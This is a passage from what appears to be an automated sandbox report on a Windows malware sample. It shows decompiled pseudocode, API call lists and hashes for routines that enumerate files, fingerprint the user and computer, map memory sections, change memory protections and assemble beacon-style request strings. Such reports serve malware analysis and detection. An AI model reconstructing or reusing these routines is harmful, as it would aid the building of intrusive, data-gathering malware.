							_t141 = _t141 + 1;
						}
						_v12 = 1;
						FindClose(_v16); // executed
						_t146 = 0;
						goto L35;
					}
					_t165 = _t140 - _t109;
					L15:
					if(_t165 == 0 || _v12 == _v32) {
						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
						_t139 = _v40;
						_t151 = _t111 -  &(_v368.cFileName);
						_t113 = 0;
						if(_t139 != 0) {
							_t48 = _t151 - 4; // -4
							_t113 = _t48;
							if(_t113 > _t151) {
								_t113 = 0;
							}
						}
						if(_t151 > 4) {
							_t151 = 4;
						}
						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
						_t154 = _t154 + 0xc;
						_v40 =  &(_v40[_t151]);
					}
					do {
						_t119 = FindNextFileA(_v16,  &_v368); // executed
						if(_t119 == 0) {
							FindClose(_v16);
							_v16 = FindFirstFileA(_v20,  &_v368);
						}
					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
					_v12 = _v12 + 1;
				}
			}

0x001d4c44
0x001d4c4a
0x001d4c4c
0x001d4c66
0x001d4c68
0x001d4c6d
0x001d4ee2
0x001d4ee9
0x001d4ee9
0x001d4c73
0x001d4c88
0x001d4c8a
0x001d4c8c
0x001d4c91
0x001d4ed2
0x001d4edc
0x00000000
0x001d4edc
0x001d4c97
0x001d4ca2
0x001d4ca7
0x001d4cac
0x001d4caf
0x001d4cb6
0x001d4cbb
0x001d4cc0
0x001d4ec2
0x001d4ecc
0x00000000
0x001d4ecc
0x001d4cd6
0x001d4cda
0x001d4cdd
0x001d4ce0
0x001d4ce6
0x001d4ceb
0x001d4cf4
0x001d4cfa
0x001d4d04
0x001d4d0b
0x001d4d0b
0x001d4d1d
0x001d4d28
0x001d4d36
0x001d4d3b
0x001d4d40
0x001d4d43
0x001d4d48
0x001d4d52
0x001d4d55
0x001d4d58
0x001d4d6e
0x001d4d70
0x001d4d75
0x001d4ec0
0x00000000
0x001d4ec0
0x001d4d8c
0x001d4ddd
0x001d4da0
0x001d4da8
0x001d4dad
0x001d4dbb
0x001d4dc4
0x001d4dcd
0x001d4dcd
0x001d4ddb
0x001d4ddb
0x001d4de1
0x001d4de5
0x001d4de5
0x001d4deb
0x00000000
0x00000000
0x001d4ded
0x001d4df3
0x001d4e9a
0x001d4e9d
0x001d4eaa
0x001d4eaa
0x001d4eae
0x00000000
0x00000000
0x001d4ea3
0x001d4ea7
0x001d4ea7
0x001d4ea9
0x001d4ea9
0x001d4eb3
0x001d4eba
0x001d4ebc
0x00000000
0x001d4ebc
0x001d4df9
0x001d4dfb
0x001d4dfb
0x001d4e0e
0x001d4e14
0x001d4e1f
0x001d4e21
0x001d4e25
0x001d4e27
0x001d4e27
0x001d4e2c
0x001d4e2e
0x001d4e2e
0x001d4e2c
0x001d4e33
0x001d4e37
0x001d4e37
0x001d4e47
0x001d4e4c
0x001d4e4f
0x001d4e4f
0x001d4e52
0x001d4e5c
0x001d4e64
0x001d4e69
0x001d4e77
0x001d4e77
0x001d4e8b
0x001d4e8f
0x001d4e8f

APIs

RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 001D4C66
RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 001D4C88
memset.NTDLL ref: 001D4CA2

Part of subcall function 001D903C: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,001D5D90,63699BCE,001D4CBB,73797325), ref: 001D904D
Part of subcall function 001D903C: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 001D9067

CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 001D4CE0
GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D4CF4
CloseHandle.KERNEL32(00000000), ref: 001D4D0B
StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 001D4D17
lstrcat.KERNEL32(?,642E2A5C), ref: 001D4D58
FindFirstFileA.KERNELBASE(?,?), ref: 001D4D6E
CompareFileTime.KERNEL32(?,?), ref: 001D4D8C
FindNextFileA.KERNELBASE(001D41AA,?), ref: 001D4DA0
FindClose.KERNEL32(001D41AA), ref: 001D4DAD
FindFirstFileA.KERNEL32(?,?), ref: 001D4DB9
CompareFileTime.KERNEL32(?,?), ref: 001D4DDB
StrChrA.SHLWAPI(?,0000002E), ref: 001D4E0E
memcpy.NTDLL(00000000,?,00000000), ref: 001D4E47
FindNextFileA.KERNELBASE(001D41AA,?), ref: 001D4E5C
FindClose.KERNEL32(001D41AA), ref: 001D4E69
FindFirstFileA.KERNEL32(?,?), ref: 001D4E75
CompareFileTime.KERNEL32(?,?), ref: 001D4E85
FindClose.KERNELBASE(001D41AA), ref: 001D4EBA
HeapFree.KERNEL32(00000000,00000000,73797325), ref: 001D4ECC
HeapFree.KERNEL32(00000000,?), ref: 001D4EDC

Memory Dump Source

Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp Download File

Similarity

API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$CreateHandlelstrcatmemcpymemset
String ID:
API String ID: 455834338-0
Opcode ID: 7d9e03a70373fbb937039ca07a1922f3611422dbacf0ff1fcb2fbcb6d67d9ea0
Instruction ID: 668ec5cb1c64ed30e12102b5bc5826309b4203029f91ba743336290b352de6b5
Opcode Fuzzy Hash: 7d9e03a70373fbb937039ca07a1922f3611422dbacf0ff1fcb2fbcb6d67d9ea0
Instruction Fuzzy Hash: B081397290121AEFDF119FA9DC84AEEBBB9FF54300F10056BE505E6260D7759A84CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E241237, Relevance: 15.1, APIs: 10, Instructions: 98
threadsleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E6E241237(char _a4) {
				long _v8;
				struct _SYSTEMTIME _v24;
				char _v48;
				void* __edi;
				long _t20;
				int _t22;
				long _t25;
				long _t26;
				long _t30;
				void* _t36;
				intOrPtr _t38;
				intOrPtr _t43;
				signed int _t44;
				void* _t48;
				signed int _t51;
				void* _t54;
				intOrPtr* _t55;

				_t20 = E6E241CDD();
				_v8 = _t20;
				if(_t20 != 0) {
					return _t20;
				}
				do {
					GetSystemTime( &_v24);
					_t22 = SwitchToThread();
					asm("cdq");
					_t44 = 9;
					_t51 = _t22 + (_v24.wMilliseconds & 0x0000ffff) % _t44;
					_t25 = E6E2410E8(0, _t51); // executed
					_v8 = _t25;
					Sleep(_t51 << 5); // executed
					_t26 = _v8;
				} while (_t26 == 0xc);
				if(_t26 != 0) {
					L18:
					return _t26;
				}
				if(_a4 != 0) {
					L11:
					_push(0);
					_t54 = E6E24179C(E6E241424,  &_v48);
					if(_t54 == 0) {
						_v8 = GetLastError();
					} else {
						_t30 = WaitForSingleObject(_t54, 0xffffffff);
						_v8 = _t30;
						if(_t30 == 0) {
							GetExitCodeThread(_t54,  &_v8);
						}
						CloseHandle(_t54);
					}
					_t26 = _v8;
					if(_t26 == 0xffffffff) {
						_t26 = GetLastError();
					}
					goto L18;
				}
				if(E6E241BE5(_t44,  &_a4) != 0) {
					 *0x6e244138 = 0;
					goto L11;
				}
				_t43 = _a4;
				_t55 = __imp__GetLongPathNameW;
				_t36 =  *_t55(_t43, 0, 0); // executed
				_t48 = _t36;
				if(_t48 == 0) {
					L9:
					 *0x6e244138 = _t43;
					goto L11;
				}
				_t14 = _t48 + 2; // 0x2
				_t38 = E6E241CC8(_t48 + _t14);
				 *0x6e244138 = _t38;
				if(_t38 == 0) {
					goto L9;
				}
				 *_t55(_t43, _t38, _t48); // executed
				E6E24133D(_t43);
				goto L11;
			}

0x6e24123e
0x6e241245
0x6e24124a
0x6e24133a
0x6e24133a
0x6e241251
0x6e241255
0x6e24125b
0x6e241269
0x6e24126a
0x6e24126d
0x6e241270
0x6e241279
0x6e24127c
0x6e241282
0x6e241285
0x6e24128c
0x6e241337
0x00000000
0x6e241337
0x6e241296
0x6e2412e7
0x6e2412e7
0x6e2412fd
0x6e241302
0x6e24132a
0x6e241304
0x6e241307
0x6e24130d
0x6e241312
0x6e241319
0x6e241319
0x6e241320
0x6e241320
0x6e24132d
0x6e241333
0x6e241335
0x6e241335
0x00000000
0x6e241333
0x6e2412a3
0x6e2412e1
0x00000000
0x6e2412e1
0x6e2412a5
0x6e2412a8
0x6e2412b1
0x6e2412b3
0x6e2412b7
0x6e2412d9
0x6e2412d9
0x00000000
0x6e2412d9
0x6e2412b9
0x6e2412be
0x6e2412c3
0x6e2412ca
0x00000000
0x00000000
0x6e2412cf
0x6e2412d2
0x00000000

APIs

Part of subcall function 6E241CDD: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E241243,74B063F0), ref: 6E241CEC
Part of subcall function 6E241CDD: GetVersion.KERNEL32 ref: 6E241CFB
Part of subcall function 6E241CDD: GetCurrentProcessId.KERNEL32 ref: 6E241D17
Part of subcall function 6E241CDD: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E241D30

GetSystemTime.KERNEL32(?,00000000,74B063F0), ref: 6E241255
SwitchToThread.KERNEL32 ref: 6E24125B

Part of subcall function 6E2410E8: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 6E24113E
Part of subcall function 6E2410E8: memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 6E241204

Sleep.KERNELBASE(00000000,00000000), ref: 6E24127C
GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6E2412B1
GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6E2412CF
WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 6E241307
GetExitCodeThread.KERNEL32(00000000,?), ref: 6E241319
CloseHandle.KERNEL32(00000000), ref: 6E241320
GetLastError.KERNEL32(?,00000000), ref: 6E241328
GetLastError.KERNEL32 ref: 6E241335

Memory Dump Source

Source File: 00000000.00000002.480384198.000000006E241000.00000020.00020000.sdmp, Offset: 6E240000, based on PE: true

Associated: 00000000.00000002.480363344.000000006E240000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.480398487.000000006E243000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.480413214.000000006E245000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.480434274.000000006E246000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastLongNamePathProcessThread$AllocCloseCodeCreateCurrentEventExitHandleObjectOpenSingleSleepSwitchSystemTimeVersionVirtualWaitmemcpy
String ID:
API String ID: 1962885430-0
Opcode ID: 189d7c23854f3341d627936f60fcac966e4c98c595be1abc70c197ddd2040fa7
Instruction ID: 5278bee4b763a206ff5b07ea8e44d17f497be1635948ba19cd1fe828555df728
Opcode Fuzzy Hash: 189d7c23854f3341d627936f60fcac966e4c98c595be1abc70c197ddd2040fa7
Instruction Fuzzy Hash: BF31B675800A2DEBDB09EBE5CC48D9E7ABFEB86325B100512E911E3140E770CA98CB70

Uniqueness

Uniqueness Score: -1.00%

Function 6E2B5770, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,000007D1,00003000,00000040,000007D1,6E2B51C8), ref: 6E2B582D
VirtualAlloc.KERNEL32(00000000,00000059,00003000,00000040,6E2B5229), ref: 6E2B5864
VirtualAlloc.KERNEL32(00000000,00016DD9,00003000,00000040), ref: 6E2B58C4
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E2B58FA
VirtualProtect.KERNEL32(6E240000,00000000,00000004,6E2B574F), ref: 6E2B59FF
VirtualProtect.KERNEL32(6E240000,00001000,00000004,6E2B574F), ref: 6E2B5A26
VirtualProtect.KERNEL32(00000000,?,00000002,6E2B574F), ref: 6E2B5AF3
VirtualProtect.KERNEL32(00000000,?,00000002,6E2B574F,?), ref: 6E2B5B49
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E2B5B65

Memory Dump Source

Source File: 00000000.00000002.480938016.000000006E2B5000.00000040.00020000.sdmp, Offset: 6E2B5000, based on PE: false

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: 25725fe3ea5edefb74e8182b314af060065adca4d4aa0626c8a3a422ebf314a2
Instruction ID: 6c745d1252552f361657073bcf2cc6166a8526736039d4674cf52b66e0d2632a
Opcode Fuzzy Hash: 25725fe3ea5edefb74e8182b314af060065adca4d4aa0626c8a3a422ebf314a2
Instruction Fuzzy Hash: 24D1BBB21446019FEB25CF44C8C0F51B7B7FF58318B096198ED8D9F65ADB70A820CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 001D2D6E, Relevance: 12.1, APIs: 8, Instructions: 103
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E001D2D6E(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x1dd270; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E001D427C( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x1dd2a0 ^ 0x4c0ca0ae;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x1dd238, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E001D46F9(_v8 + _v8, _t64);
							}
							HeapFree( *0x1dd238, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x1dd238, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E001D46F9(_v8 + _v8, _t64);
						}
						HeapFree( *0x1dd238, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}

0x001d2d6e
0x001d2d76
0x001d2d7a
0x001d2d7d
0x001d2d82
0x001d2d84
0x001d2d89
0x001d2d89
0x001d2d8f
0x001d2d91
0x001d2d9e
0x001d2dff
0x001d2da0
0x001d2da5
0x001d2dab
0x001d2db0
0x001d2dbe
0x001d2dc2
0x001d2dd1
0x001d2dd8
0x001d2ddf
0x001d2ddf
0x001d2dea
0x001d2dea
0x001d2dc2
0x001d2db0
0x001d2e01
0x001d2e07
0x001d2e11
0x001d2e13
0x001d2e18
0x001d2e27
0x001d2e2b
0x001d2e36
0x001d2e3d
0x001d2e44
0x001d2e44
0x001d2e50
0x001d2e50
0x001d2e2b
0x001d2e5b
0x001d2e5d
0x001d2e60
0x001d2e62
0x001d2e65
0x001d2e68
0x001d2e72
0x001d2e76
0x001d2e7a

APIs

GetUserNameW.ADVAPI32(00000000,?), ref: 001D2DA5
RtlAllocateHeap.NTDLL(00000000,?), ref: 001D2DBC
GetUserNameW.ADVAPI32(00000000,?), ref: 001D2DC9
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,001D5D80), ref: 001D2DEA
GetComputerNameW.KERNEL32(00000000,00000000), ref: 001D2E11
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001D2E25
GetComputerNameW.KERNEL32(00000000,00000000), ref: 001D2E32
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,001D5D80), ref: 001D2E50

Memory Dump Source

Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp Download File

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID:
API String ID: 3239747167-0
Opcode ID: 85bfe58c0d83d6476311eb3e4ad05de20e6f04b8cac8719d933bfc0155db8af5
Instruction ID: 3203ed09b876da666a815ea14409576ad20c887d86423e97318852f3a4858b0c
Opcode Fuzzy Hash: 85bfe58c0d83d6476311eb3e4ad05de20e6f04b8cac8719d933bfc0155db8af5
Instruction Fuzzy Hash: A7311872A01206EFDB10DFA9DD81A6EB7F9FF98300F61452AE515D7620EB30EE419B50

Uniqueness

Uniqueness Score: -1.00%

Function 001D1168, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E001D1168(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E001D7E20(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E001DA5FA(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x001d1175
0x001d1176
0x001d1177
0x001d1178
0x001d1179
0x001d117d
0x001d1184
0x001d1193
0x001d1196
0x001d1199
0x001d11a0
0x001d11a3
0x001d11a6
0x001d11a9
0x001d11ac
0x001d11b7
0x001d11b9
0x001d11c2
0x001d11ca
0x001d11cc
0x001d11de
0x001d11e8
0x001d11ec
0x001d11fb
0x001d11ff
0x001d1208
0x001d1210
0x001d1210
0x001d1212
0x001d1212
0x001d121a
0x001d1220
0x001d1224
0x001d1224
0x001d122f

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 001D11AF
NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 001D11C2
NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 001D11DE

Part of subcall function 001D7E20: RtlAllocateHeap.NTDLL(00000000,00000000,001D8112), ref: 001D7E2C

NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 001D11FB
memcpy.NTDLL(00000000,00000000,0000001C), ref: 001D1208
NtClose.NTDLL(?), ref: 001D121A
NtClose.NTDLL(00000000), ref: 001D1224

Memory Dump Source

Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp Download File

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: 7916940d13eac0714ca15a6b2c0c5d2b2f0af2a0775b2a8d94acde679d8cc629
Instruction ID: 7706d7eb31f194aa2c024208ee454ea935ec9bcbb27c8e44de5563f883918ce8
Opcode Fuzzy Hash: 7916940d13eac0714ca15a6b2c0c5d2b2f0af2a0775b2a8d94acde679d8cc629
Instruction Fuzzy Hash: 9921E7B2A01229BBDB01DF95DC85ADEBFBDEF18740F104016F901E6261D7719A84DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E2415F1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E6E2415F1(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E6E241F14(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x6e2415fa
0x6e241601
0x6e241602
0x6e241603
0x6e241604
0x6e241605
0x6e241616
0x6e24161a
0x6e24162e
0x6e241631
0x6e241634
0x6e24163b
0x6e24163e
0x6e241645
0x6e241648
0x6e24164b
0x6e24164e
0x6e241653
0x6e24168e
0x6e241655
0x6e241658
0x6e24165e
0x6e241663
0x6e241667
0x6e241685
0x6e241669
0x6e241670
0x6e24167e
0x6e24167e
0x6e241667
0x6e241696

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000,?), ref: 6E24164E

Part of subcall function 6E241F14: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,6E241663,00000002,00000000,?,?,00000000,?,?,6E241663,00000002), ref: 6E241F41

memset.NTDLL ref: 6E241670

Strings

@, xrefs: 6E24163E

Memory Dump Source

Source File: 00000000.00000002.480384198.000000006E241000.00000020.00020000.sdmp, Offset: 6E240000, based on PE: true

Associated: 00000000.00000002.480363344.000000006E240000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.480398487.000000006E243000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.480413214.000000006E245000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.480434274.000000006E246000.00000002.00020000.sdmp Download File

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: 39e720e2c94793e4bf624767ebfb882cd87e7a4b170212c2c62006b4db7c7316
Instruction ID: 709a5471a08e8ab81e948f367a6770f83130d51cf2deed4552bd097e1e55ba95
Opcode Fuzzy Hash: 39e720e2c94793e4bf624767ebfb882cd87e7a4b170212c2c62006b4db7c7316
Instruction Fuzzy Hash: 2B21F9B6D0020DAFDB01CFE9C8849DEFBB9EB48354F108429E505F3210D730AA598B64

Uniqueness

Uniqueness Score: -1.00%

Function 6E278960, Relevance: 3.7, Strings: 2, Instructions: 1211COMMON

Download Yara Rule

Strings

e, xrefs: 6E278CE5
Q, xrefs: 6E27939D

Memory Dump Source

Source File: 00000000.00000002.480497623.000000006E250000.00000020.00020000.sdmp, Offset: 6E250000, based on PE: false

Similarity

API ID:
String ID: Q$e
API String ID: 0-1578101220
Opcode ID: 4b16155977349b0c69f5dd830565383ff23465e0584ef4e99a1b84df2c602f7d
Instruction ID: 2a4576599b4f5a052ae5fb22c8613e81423caa59af7b6d0df5a90eea85678ed4
Opcode Fuzzy Hash: 4b16155977349b0c69f5dd830565383ff23465e0584ef4e99a1b84df2c602f7d
Instruction Fuzzy Hash: 92A2F571E48B298FCF18CF7DC89C9557BA3BF96308B058A29E5498B385D6F09509CB70

Uniqueness

Uniqueness Score: -1.00%

Function 6E241F14, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E6E241F14(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x6e241f26
0x6e241f2c
0x6e241f3a
0x6e241f41
0x6e241f46
0x6e241f4c
0x00000000
0x6e241f4d
0x00000000

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,6E241663,00000002,00000000,?,?,00000000,?,?,6E241663,00000002), ref: 6E241F41

Memory Dump Source

Source File: 00000000.00000002.480384198.000000006E241000.00000020.00020000.sdmp, Offset: 6E240000, based on PE: true

Associated: 00000000.00000002.480363344.000000006E240000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.480398487.000000006E243000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.480413214.000000006E245000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.480434274.000000006E246000.00000002.00020000.sdmp Download File

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: 0db1f313645c3cf222922a8decbb90cd028158adbc3c839dcee37312fe8dfc66
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: 67F0F8B690420CFFEB119EA5CC85C9BBBBDEB44294B104A69B652A1090D630AE5D8A60

Uniqueness

Uniqueness Score: -1.00%

Function 001D24B4, Relevance: 33.2, APIs: 22, Instructions: 245
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E001D24B4(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t67;
				intOrPtr _t68;
				int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr* _t88;
				void* _t94;
				intOrPtr _t101;
				signed int _t105;
				char** _t107;
				int _t110;
				intOrPtr* _t113;
				intOrPtr* _t115;
				intOrPtr* _t117;
				intOrPtr* _t119;
				intOrPtr _t122;
				intOrPtr _t127;
				int _t131;
				CHAR* _t133;
				intOrPtr _t134;
				void* _t135;
				void* _t144;
				int _t145;
				void* _t146;
				intOrPtr _t147;
				void* _t149;
				long _t153;
				intOrPtr* _t154;
				intOrPtr* _t155;
				intOrPtr* _t158;
				void* _t159;
				void* _t161;

				_t144 = __edx;
				_t135 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t59 = GetTickCount();
				}
				_t60 =  *0x1dd018; // 0xd1eb352c
				asm("bswap eax");
				_t61 =  *0x1dd014; // 0x3a87c8cd
				_t133 = _a16;
				asm("bswap eax");
				_t62 =  *0x1dd010; // 0xd8d2f808
				asm("bswap eax");
				_t63 = E001DD00C; // 0xeec43f25
				asm("bswap eax");
				_t64 =  *0x1dd2a4; // 0x2dca5a8
				_t3 = _t64 + 0x1de633; // 0x74666f73
				_t145 = wsprintfA(_t133, _t3, 3, 0x3d154, _t63, _t62, _t61, _t60, E001DD02C,  *0x1dd004, _t59);
				_t67 = E001D2914();
				_t68 =  *0x1dd2a4; // 0x2dca5a8
				_t4 = _t68 + 0x1de673; // 0x74707526
				_t71 = wsprintfA(_t145 + _t133, _t4, _t67);
				_t161 = _t159 + 0x38;
				_t146 = _t145 + _t71; // executed
				_t72 = E001D3F0E(_t135); // executed
				_t134 = __imp__;
				_v8 = _t72;
				if(_t72 != 0) {
					_t127 =  *0x1dd2a4; // 0x2dca5a8
					_t7 = _t127 + 0x1de8eb; // 0x736e6426
					_t131 = wsprintfA(_a16 + _t146, _t7, _t72);
					_t161 = _t161 + 0xc;
					_t146 = _t146 + _t131;
					HeapFree( *0x1dd238, 0, _v8);
				}
				_t73 = E001D1363();
				_v8 = _t73;
				if(_t73 != 0) {
					_t122 =  *0x1dd2a4; // 0x2dca5a8
					_t11 = _t122 + 0x1de8f3; // 0x6f687726
					wsprintfA(_t146 + _a16, _t11, _t73);
					_t161 = _t161 + 0xc;
					HeapFree( *0x1dd238, 0, _v8);
				}
				_t147 =  *0x1dd32c; // 0x2fa95b0
